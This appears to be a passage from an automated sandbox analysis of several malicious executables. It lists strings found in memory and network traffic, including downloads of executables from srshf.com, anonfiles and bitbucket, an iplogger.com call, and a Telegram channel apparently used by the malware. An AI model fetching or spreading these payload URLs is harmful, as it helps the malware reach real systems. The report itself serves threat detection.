                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response(5
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response(5
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response(5
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Responsest(5
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4(5
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Sy(5
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.596318872.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: 453D.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: 453D.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: 453D.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                      Source: explorer.exe, 00000001.00000000.299404500.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286478895.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.276466462.000000000F276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.307788321.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257994552.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: 816F.exe, 0000001A.00000003.486913781.00000000060F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                      Source: 816F.exe, 0000001A.00000003.484605971.00000000060F4000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.485467854.00000000060F4000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.485684143.00000000060F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comU
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coml1
                      Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comol
                      Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comt
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: 816F.exe, 0000001A.00000003.481873237.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.482552811.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.483230683.00000000060F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/U
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: 816F.exe, 0000001A.00000003.481873237.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.482552811.00000000060F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn3
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: argq.exe.33.dr, argq[1].exe.33.drString found in binary or memory: http://www.info-zip.org/zip-bug.html;
                      Source: 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
                      Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504941447.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
                      Source: 816F.exe, 0000001A.00000003.494973945.00000000060C5000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
                      Source: 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/P
                      Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504941447.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/c
                      Source: 816F.exe, 0000001A.00000003.494973945.00000000060C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                      Source: 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/u
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 816F.exe, 0000001A.00000003.483869752.00000000060F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnU
                      Source: 41479232570897308364731578.45.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: 41479232570897308364731578.45.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 453D.exe.1.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: 453D.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: 453D.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: 86EE.exe, 0000002D.00000003.488228184.00000000275BE000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                      Source: 41479232570897308364731578.45.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 41479232570897308364731578.45.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/L
                      Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: 94088433411392910584223625.45.drString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
                      Source: 94088433411392910584223625.45.drString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
                      Source: 86EE.exe, 0000002D.00000003.488301104.00000000275CA000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.488058790.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.drString found in binary or memory: https://support.google.com/chrome?p=update_error
                      Source: 94088433411392910584223625.45.drString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
                      Source: 94088433411392910584223625.45.drString found in binary or memory: https://support.google.com/installer/?product=
                      Source: 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                      Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476529249.0000000001523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/deadftx
                      Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/deadftxhttps://www.tiktok.com/
                      Source: 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: 2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: 94088433411392910584223625.45.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                      Source: 41578002959771932956378793.45.dr, 94088433411392910584223625.45.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
                      Source: 86EE.exe, 0000002D.00000003.488228184.00000000275BE000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.489485701.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                      Source: 94088433411392910584223625.45.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                      Source: 94088433411392910584223625.45.drString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
                      Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/
                      Source: unknownDNS traffic detected: queries for: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
                      Source: global trafficHTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
